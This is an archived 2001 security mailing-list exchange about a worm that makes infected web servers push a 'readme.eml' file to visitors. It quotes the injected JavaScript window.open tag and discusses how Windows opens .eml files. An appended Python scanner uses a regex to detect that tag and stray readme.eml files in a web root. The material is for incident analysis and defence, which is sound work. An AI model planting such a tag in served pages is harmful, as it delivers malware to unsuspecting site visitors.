.eml is listed in the Registry as "Microsoft Internet Mail Message" with
Content Type = "message/rfc822". On my Windows 2000 system this will
result in a program called \WINDOWS\system32\thumbvw.exe being executed
using the Apartment threading model.

- Jeff

> When pages are served up by an infected server, it looks as though
> readme.eml is 'attached' to them. The server attempts to get the client to
> open them through the following bit of code (from the .dll file):
>
> <script language="JavaScript">window.open("readme.eml", null,
> "resizable=no,top=6000,left=6000")</script>
>
> According to Slashdot, this causes the file to be automatically opened and
> executed by the client. I haven't been able to confirm or deny that (but if
> someone can, please do).
>
> Regards,
> Matt
>
>
> --
> Matt Davis, MCP
> Intermediate Client Server Business Support Analyst
> COUNTRY(SM) Insurance & Financial Services
> 309-821-6288
> mailto:matt.davisat_private
>

Jeffrey Altman * Sr.Software Designer      C-Kermit 8.0 Beta available
The Kermit Project @ Columbia University   includes Secure Telnet and FTP
http://www.kermit-project.org/             using Kerberos, SRP, and
kermit-support@kermit-project.org          OpenSSL. SSH soon to follow.

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management
and tracking system please see: http://aris.securityfocus.com

This archive was generated by hypermail 2b30 : Tue Sep 18 2001 - 18:15:49 PDT
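
An added example, not part of the original messages: a Python check an administrator could run over a web document root to find pages carrying the script tag quoted in the thread, plus any readme.eml files sitting beside them. The sample pages, the suffix list and the function names are constructed for illustration.

```python
import re
import tempfile
from pathlib import Path

# The tag quoted in the message, matched loosely: any attributes on <script>,
# either quote style, any case, and whitespace or line breaks between tokens.
INJECTED = re.compile(
    r"""<script\b[^>]*>\s*window\.open\(\s*["']readme\.eml["']""",
    re.IGNORECASE,
)
PAGE_SUFFIXES = {".htm", ".html", ".asp"}  # assumption: page types to check

# Constructed sample pages, not captured from a real server.
CLEAN_PAGE = "<html><body><p>Welcome</p></body></html>\n"
TAGGED_PAGE = CLEAN_PAGE + (
    '<script language="JavaScript">window.open("readme.eml", null,\n'
    '"resizable=no,top=6000,left=6000")</script>\n'
)


def find_injection(text):
    """Return the 1-based line numbers where the injected tag starts."""
    return [text.count("\n", 0, m.start()) + 1 for m in INJECTED.finditer(text)]


def scan_tree(root):
    """Return ({tagged page: hit lines}, [readme.eml paths]) relative to root."""
    tagged, eml_files = {}, []
    for path in sorted(Path(root).rglob("*")):
        if not path.is_file():
            continue
        rel = path.relative_to(root).as_posix()
        if path.name.lower() == "readme.eml":
            eml_files.append(rel)
        elif path.suffix.lower() in PAGE_SUFFIXES:
            # latin-1 decodes any byte sequence, so odd encodings cannot abort the scan
            lines = find_injection(path.read_text(encoding="latin-1"))
            if lines:
                tagged[rel] = lines
    return tagged, eml_files


def demo():
    """Build a throwaway web root from the constructed samples and scan it."""
    with tempfile.TemporaryDirectory() as root:
        Path(root, "index.html").write_text(CLEAN_PAGE)
        Path(root, "default.htm").write_text(TAGGED_PAGE)
        Path(root, "readme.eml").write_text("constructed placeholder\n")
        return scan_tree(root)
```

Calling scan_tree() on a real document root returns the pages to restore from known-good copies and the readme.eml files to remove.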